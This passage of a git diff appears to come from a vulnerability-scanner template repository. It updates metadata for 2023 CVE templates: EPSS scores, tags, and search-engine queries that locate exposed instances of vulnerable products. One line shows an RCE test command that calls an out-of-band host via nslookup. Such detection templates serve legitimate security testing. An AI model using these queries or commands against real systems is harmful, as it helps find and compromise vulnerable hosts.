+ - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 3055c93f20..99c2bff499 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2648 cwe-id: CWE-434 - epss-score: 0.05365 - epss-percentile: 0.9293 + epss-score: 0.08638 + epss-percentile: 0.94483 cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: weaver product: e-office - fofa-query: app="泛微-EOffice" + fofa-query: + - app="泛微-EOffice" + - app="泛微-eoffice" tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive variables: file: '{{rand_base(5, "abc")}}' diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index b3bef1f57a..781ca70bf6 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atutor product: atutor - shodan-query: http.html:"Atutor" + shodan-query: + - http.html:"Atutor" + - http.html:"atutor" fofa-query: body="atutor" tags: cve,cve2023,xss,atutor diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 85a9e396e0..1dca70f4f0 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -19,12 +19,12 @@ info: cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: idnovate - product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter + product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter" framework: prestashop - shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,advancedpopupcreator + shodan-query: "http.component:\"prestashop\"" + tags: cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate http: - raw: diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index e668a74cea..3889cedc25 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: appwrite product: appwrite - shodan-query: title:"Sign In - Appwrite" - fofa-query: icon_hash=-633108100 + shodan-query: + - title:"Sign In - Appwrite" + - http.title:"sign in - appwrite" + - http.favicon.hash:-633108100 + fofa-query: + - icon_hash=-633108100 + - title="sign in - appwrite" google-query: intitle:"sign in - appwrite" tags: cve2023,cve,appwrite,ssrf,oast diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 561a9c1e67..9ee18735bd 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"opencats" + shodan-query: + - title:"opencats" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve2023,cve,authenticated,tenable,opencats,redirect diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 7f1c5ccad0..fc7b92ae06 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -30,6 +30,9 @@ info: vendor: inspireui product: mstore_api framework: wordpress + publicwww-query: /wp-content/plugins/mstore-api/ + shodan-query: http.html:/wp-content/plugins/mstore-api/ + fofa-query: body=/wp-content/plugins/mstore-api/ tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui http: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 3d4550d423..8f03713c44 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -29,8 +29,14 @@ info: max-request: 10 vendor: papercut product: papercut_mf - shodan-query: http.html:"PaperCut" - fofa-query: body="papercut" + shodan-query: + - http.html:"PaperCut" + - http.html:"papercut" + - http.html:"content=\"papercut\"" + - cpe:"cpe:2.3:a:papercut:papercut_mf" + fofa-query: + - body="papercut" + - body="content=\"papercut\"" tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index bf59d9c052..3f147c1e6e 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -28,7 +28,10 @@ info: max-request: 2 vendor: spip product: spip - shodan-query: html:"spip.php?page=backend" + shodan-query: + - html:"spip.php?page=backend" + - http.html:"spip.php?page=backend" + - cpe:"cpe:2.3:a:spip:spip" fofa-query: body="spip.php?page=backend" tags: cve,cve2023,packetstorm,spip,rce diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index a9759ecba1..d5e0cd9b50 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -30,7 +30,10 @@ info: max-request: 3 vendor: home-assistant product: home-assistant - shodan-query: title:"Home Assistant" + shodan-query: + - title:"Home Assistant" + - http.title:"home assistant" + - cpe:"cpe:2.3:a:home-assistant:home-assistant" fofa-query: title="home assistant" google-query: intitle:"home assistant" tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 5f08488576..b47418c1cd 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -28,8 +28,13 @@ info: max-request: 45 vendor: apache product: superset - shodan-query: html:"Apache Superset" - fofa-query: body="apache superset" + shodan-query: + - html:"Apache Superset" + - http.favicon.hash:1582430156 + - http.html:"apache superset" + fofa-query: + - body="apache superset" + - icon_hash=1582430156 tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev http: diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index 3c31342b86..2480d5748d 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: weaver product: weaver_office_automation - fofa-query: app="泛微-EOffice" + fofa-query: + - app="泛微-EOffice" + - app="泛微-eoffice" tags: cve,cve2023,weaver,eoffice,exposure http: diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 7c973b8f15..39939fbab3 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -30,7 +30,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index bcf8ef4748..f651dd306b 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -29,9 +29,17 @@ info: vendor: myeventon product: eventon framework: wordpress - shodan-query: 'vuln:CVE-2023-2796' - fofa-query: "wp-content/plugins/eventon/" - publicwww-query: /wp-content/plugins/eventon/ + shodan-query: + - 'vuln:CVE-2023-2796' + - http.html:/wp-content/plugins/eventon-lite/ + - http.html:/wp-content/plugins/eventon/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - /wp-content/plugins/eventon/ + - /wp-content/plugins/eventon-lite/ google-query: inurl:"/wp-content/plugins/eventon/" tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 32f6ae8a7f..e95a79f3b1 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ellucian product: ethos_identity - shodan-query: html:"Ellucian Company" + shodan-query: + - html:"Ellucian Company" + - http.html:"ellucian company" fofa-query: body="ellucian company" google-query: "login with ellucian ethos identity" tags: cve2023,cve,cas,xss,ellucian diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 7fd7b59455..26664e47c7 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -27,7 +27,10 @@ info: max-request: 16 vendor: gitlab product: gitlab - shodan-query: title:"Gitlab" + shodan-query: + - title:"Gitlab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2023,cve,gitlab,lfi,authenticated,intrusive diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 4020684296..77204f5b20 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -28,9 +28,13 @@ info: max-request: 1 vendor: apsystems product: energy_communication_unit_firmware - shodan-query: title:"Altenergy Power Control Software" + shodan-query: + - title:"Altenergy Power Control Software" + - http.title:"altenergy power control software" fofa-query: title="altenergy power control software" - google-query: intitle:"Altenergy Power Control Software" + google-query: + - intitle:"Altenergy Power Control Software" + - intitle:"altenergy power control software" tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems http: diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 3d6e1da347..6e80e2bc66 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -28,9 +28,19 @@ info: max-request: 1 vendor: minio product: minio - shodan-query: title:"Minio Console" - fofa-query: app="Minio" - google-query: intitle:"minio browser" + shodan-query: + - title:"Minio Console" + - http.title:"minio browser" + - cpe:"cpe:2.3:a:minio:minio" + - http.title:"minio console" + fofa-query: + - app="Minio" + - app="minio" + - title="minio browser" + - title="minio console" + google-query: + - intitle:"minio browser" + - intitle:"minio console" tags: cve,cve2023,minio,console,exposure,kev http: diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index a46f1b5e89..0270804031 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -30,7 +30,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" - tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher + tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 77b69e710c..275e01e0fb 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -28,8 +28,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 6e6f180d4f..a461f33987 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -28,8 +28,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 4fe89549c6..0821da32d7 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -24,8 +24,12 @@ info: max-request: 2 vendor: microsoft product: sharepoint_server - shodan-query: http.headers_hash:-1968878704 - fofa-query: app="Microsoft-SharePoint" + shodan-query: + - http.headers_hash:-1968878704 + - cpe:"cpe:2.3:a:microsoft:sharepoint_server" + fofa-query: + - app="Microsoft-SharePoint" + - app="microsoft-sharepoint" tags: cve,cve2023,microsoft,sharepoint_server,kev variables: client_id: "00000003-0000-0ff1-ce00-000000000000" diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index 74721e7b72..b49346549b 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -23,8 +23,16 @@ info: max-request: 1 vendor: open-emr product: openemr - shodan-query: http.favicon.hash:1971268439 - fofa-query: app="OpenEMR" + shodan-query: + - http.favicon.hash:1971268439 + - http.html:"openemr" + - http.title:"openemr" + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 2e81f35956..9be93486ee 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -21,17 +21,25 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29489 cwe-id: CWE-79 - epss-score: 0.00302 - epss-percentile: 0.69029 + epss-score: 0.00354 + epss-percentile: 0.71955 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: cpanel product: cpanel - shodan-query: title:"cPanel" - fofa-query: title="cpanel - api codes" - google-query: intitle:"cpanel - api codes" + shodan-query: + - "title:\"cPanel\"" + - http.title:"cpanel" + - cpe:"cpe:2.3:a:cpanel:cpanel" + - http.title:"cpanel - api codes" + fofa-query: + - "title=\"cpanel - api codes\"" + - title="cpanel" + google-query: + - "intitle:\"cpanel - api codes\"" + - intitle:"cpanel" tags: cve,cve2023,cpanel,xss http: diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index e52254663d..feb36ac837 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -21,8 +21,16 @@ info: max-request: 1 vendor: open-emr product: openemr - shodan-query: http.favicon.hash:1971268439 - fofa-query: app="OpenEMR" + shodan-query: + - http.favicon.hash:1971268439 + - http.html:"openemr" + - http.title:"openemr" + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 191862087f..56a2e6cb1e 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -27,7 +27,7 @@ info: vendor: ejs product: ejs framework: node.js - tags: cve,cve2023,ssti,rce,ejs,oast + tags: cve,cve2023,ssti,rce,ejs,oast,node.js http: - method: GET diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index c6f2618ba2..eb78bf2d4e 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: contec product: solarview_compact - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - cpe:"cpe:2.3:h:contec:solarview_compact" tags: cve,cve2023,lfi,solarview,edb,contec http: diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 67ff1e908b..1c98a43ed6 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: powerjob product: powerjob - shodan-query: html:"PowerJob" - fofa-query: app="PowerJob" + shodan-query: + - html:"PowerJob" + - http.html:"powerjob" + fofa-query: + - app="PowerJob" + - app="powerjob" + - body="powerjob" tags: cve,cve2023,auth-bypass,powerjob variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 24a9d83dcb..c38309c6a9 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -30,7 +30,10 @@ info: vendor: powerjob product: powerjob shodan-query: http.html:"powerjob" - fofa-query: app="PowerJob" + fofa-query: + - app="PowerJob" + - app="powerjob" + - body="powerjob" tags: cve2023,cve,powerjob,unauth http: diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 870bfd5717..ff89efb7d1 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: evilmartians product: imgproxy - shodan-query: "Server: imgproxy" + shodan-query: + - "Server: imgproxy" + - "server: imgproxy" tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians http: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 0abb5d4f6c..816822ceed 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -29,7 +29,9 @@ info: vendor: leotheme product: leocustomajax framework: prestashop - shodan-query: http.component:"Prestashop" + shodan-query: + - http.component:"Prestashop" + - http.component:"prestashop" tags: cve2023,cve,prestashop,sqli,leotheme http: diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index dd6a3dacd1..c9d911f06a 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -26,9 +26,18 @@ info: max-request: 4 vendor: cacti product: cacti - shodan-query: title:"Cacti" - fofa-query: icon_hash="-1797138069" - google-query: intitle:"cacti" + shodan-query: + - title:"Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve,cve2023,cacti,authenticated http: diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index d7a59891b9..24c1284829 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -27,7 +27,9 @@ info: product: mstore_api framework: wordpress publicwww-query: "/wp-content/plugins/mstore-api/" - tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli + shodan-query: http.html:/wp-content/plugins/mstore-api/ + fofa-query: body=/wp-content/plugins/mstore-api/ + tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 8aa13ee98e..fcde066731 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -26,7 +26,10 @@ info: max-request: 4 vendor: moodle product: moodle - shodan-query: title:"Moodle" + shodan-query: + - title:"Moodle" + - cpe:"cpe:2.3:a:moodle:moodle" + - http.title:"moodle" fofa-query: title="moodle" google-query: intitle:"moodle" tags: cve,cve2023,moodle,xss,rce,authenticated diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index cecedd05b2..e94820fbf6 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -26,8 +26,12 @@ info: max-request: 1 vendor: repetier-server product: repetier-server - shodan-query: title:"Repetier-Server" - fofa-query: title="Repetier-Server" + shodan-query: + - title:"Repetier-Server" + - http.title:"repetier-server" + fofa-query: + - title="Repetier-Server" + - title="repetier-server" google-query: intitle:"repetier-server" tags: cve2023,cve,repetier,lfi,repetier-server diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 334dc611e5..a8d6cb6e23 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -24,9 +24,11 @@ info: max-request: 1 vendor: cassianetworks product: xc1000_firmware - shodan-query: html:"Cassia Bluetooth Gateway Management Platform" + shodan-query: + - html:"Cassia Bluetooth Gateway Management Platform" + - http.html:"cassia bluetooth gateway management platform" fofa-query: body="cassia bluetooth gateway management platform" - tags: cve,cve2023,rce,cassia,gateway + tags: cve,cve2023,rce,cassia,gateway,cassianetworks http: - raw: diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index b79fc1eb82..abd37ce460 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -19,9 +19,11 @@ info: max-request: 1 vendor: gravitl product: netmaker - shodan-query: html:"netmaker" + shodan-query: + - html:"netmaker" + - http.html:"netmaker" fofa-query: body="netmaker" - tags: cve,cve2023,info-key,netmaker,exposure + tags: cve,cve2023,info-key,netmaker,exposure,gravitl http: - method: GET diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index a8fc161f17..f52cf4c9b6 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -28,9 +28,16 @@ info: vendor: myeventon product: eventon framework: wordpress - shodan-query: http.html:/wp-content/plugins/eventon/ - fofa-query: wp-content/plugins/eventon/ - publicwww-query: "/wp-content/plugins/eventon-lite/" + shodan-query: + - http.html:/wp-content/plugins/eventon/ + - http.html:/wp-content/plugins/eventon-lite/ + fofa-query: + - wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon-lite/" + - /wp-content/plugins/eventon/ google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 2ce3b43853..0ea1ccec7b 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -28,7 +28,9 @@ info: vendor: ghost product: ghost framework: node.js - shodan-query: http.component:"Ghost" + shodan-query: + - http.component:"Ghost" + - http.component:"ghost" tags: cve2023,cve,lfi,ghostcms,ghost,node.js http: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 30e6b9c68f..ab68aac4e5 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: igniterealtime product: openfire - shodan-query: title:"openfire" - fofa-query: title="openfire" - google-query: intitle:"openfire" + shodan-query: + - title:"openfire" + - http.title:"openfire" + - http.title:"openfire admin console" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire" + - intitle:"openfire admin console" tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime http: diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index ac6e498000..3b8946f312 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -24,7 +24,9 @@ info: max-request: 2 vendor: h3c product: magic_r300-2100m_firmware - fofa-query: app="H3C-Ent-Router" + fofa-query: + - app="H3C-Ent-Router" + - app="h3c-ent-router" tags: cve2023,cve,router,rce,h3c variables: filename: "{{to_lower(rand_text_alpha(7))}}" diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 3b3d43d113..77fe2d1c07 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: chamilo product: chamilo - shodan-query: http.component:"Chamilo" + shodan-query: + - http.component:"Chamilo" + - http.component:"chamilo" + - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve2023,cve,chamilo,unauth,cmd,rce http: diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 9acfeb4e3a..dc4149375c 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -24,7 +24,9 @@ info: max-request: 2 vendor: frangoteam product: fuxa - fofa-query: title="FUXA" + fofa-query: + - title="FUXA" + - title="fuxa" tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index ee63c31ebe..a10061d300 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -28,8 +28,14 @@ info: max-request: 2 vendor: zimbra product: collaboration - shodan-query: http.favicon.hash:475145467 - fofa-query: icon_hash="475145467" + shodan-query: + - http.favicon.hash:475145467 + - http.favicon.hash:"1624375939" + - http.favicon.hash:"475145467" + fofa-query: + - icon_hash="475145467" + - icon_hash="1624375939" + - app="zimbra-邮件系统" tags: cve,cve2023,zimbra,xss,authenticated http: diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 7bf13dbae1..3537e12045 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -28,8 +28,12 @@ info: max-request: 2 vendor: digitaldruid product: hoteldruid - shodan-query: http.title:"hoteldruid" - fofa-query: title="hoteldruid" + shodan-query: + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 612b542d3e..14cf10c76f 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: gibbonedu product: gibbon - shodan-query: http.favicon.hash:-165631681 + shodan-query: + - http.favicon.hash:-165631681 + - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,lfi,gibbonedu diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index f69511db73..be7ab029a6 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: gibbonedu product: gibbon - shodan-query: http.favicon.hash:-165631681 + shodan-query: + - http.favicon.hash:-165631681 + - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 052e9a6997..e758b81ded 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve2023,cve,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 6a30bbff88..00bf05ef97 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: 